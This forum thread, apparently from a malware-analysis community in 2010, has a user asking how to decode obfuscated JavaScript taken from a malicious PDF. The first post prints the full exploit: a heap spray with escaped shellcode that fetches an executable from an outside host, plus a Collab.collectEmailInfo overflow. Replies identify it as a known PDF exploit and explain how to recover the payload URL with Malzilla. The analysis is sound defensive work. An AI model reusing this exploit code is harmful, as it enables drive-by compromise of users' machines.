Author Topic: Please help  (Read 3353 times)

0 Members and 1 Guest are viewing this topic.

September 20, 2010, 11:16:10 am
Read 3353 times

MADY

  • Newbie

  • Offline
  • *

  • 7
Please some one tell me how to decode this code?


Quote
var mM6RItmK = new Array();



function yNYJ8yVD(HydurAUR, XbGQrcyY)

{

    while (HydurAUR.length*2<XbGQrcyY) {

        HydurAUR += HydurAUR;

    }



    HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);



    return HydurAUR;

}



function ooyS1YUR()

{

    var jKts_E9h = 0x0c0c0c0c;

    var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u612F%u6C6F%u6F63%u6E75%u6574%u2E72%u6F63%u2F6D%u6956%u4B57%u3736%u2F42%u7865%u2E65%u6870%u0070");

    var Y9Ib6uuE = 0x400000;

    var xxKaKDUU = i0a7eJNL.length * 2;

    var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);

    var HydurAUR = unescape("%u9090%u9090");



    HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);

    var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

   

    for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {

        mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;


    }

}


function RYiFEs8K()

{

    var XrCU20If = app.viewerVersion.toString();

    XrCU20If = XrCU20If.replace(/\D/g,'');





    var TPWRJTZJ = new Array(

        XrCU20If.charAt(0),

        XrCU20If.charAt(1),

        XrCU20If.charAt(2));





    if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||

        (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||

        (TPWRJTZJ[0] < 7)) {

        ooyS1YUR();

        var nabGR_dc = unescape("%u0c0c%u0c0c");

        while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;

        this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});

    }

}



RYiFEs8K();


September 20, 2010, 11:24:06 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
This is a pdf exploit (CVE-2007-5659).

url in shellcode is http://aolcounter.com/ViWK67B/exe.php.

Domain aolcounter.com doesn't exist anymore.

http://www.malwaredomainlist.com/mdl.php?search=aolcounter&colsearch=All&quantity=50&inactive=on
Ruining the bad guy's day

September 20, 2010, 12:04:14 pm
Reply #2

MADY

  • Newbie

  • Offline
  • *

  • 7
Thanks for your reply,

Could you please explain me how do it manually to know about the URL of the shellcode. I have tried  malzilla to decode it, but it had given junk strings after executing the unescape sequence.

Please help me how to find out the URL from this code since i am going to give demonstration to our ppl regarding this.

Thanks in Advance,
MADY


September 20, 2010, 01:04:13 pm
Reply #3

GmG

  • Special Members
  • Full Member

  • Offline
  • *

  • 92
malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file



September 20, 2010, 01:34:35 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file

Instead of "Hex to file" I prefer to copy/paste content to "Hex view" tab.
In most cases you can see the url at the end of hex view.
If there is no url, then shellcode is probably xor encoded.
In this case you can enter "http" into field "Strings to find". Now click button "Find".
If Malzilla finds the encoded string "http", it displays xor key in field "Key".
Now click button "Apply xor" and you will see the url in hex viewer.
Ruining the bad guy's day

September 21, 2010, 07:47:17 am
Reply #5

MADY

  • Newbie

  • Offline
  • *

  • 7
Thanks a lot sysAdmini. you are the real HERO member for this MDL  :)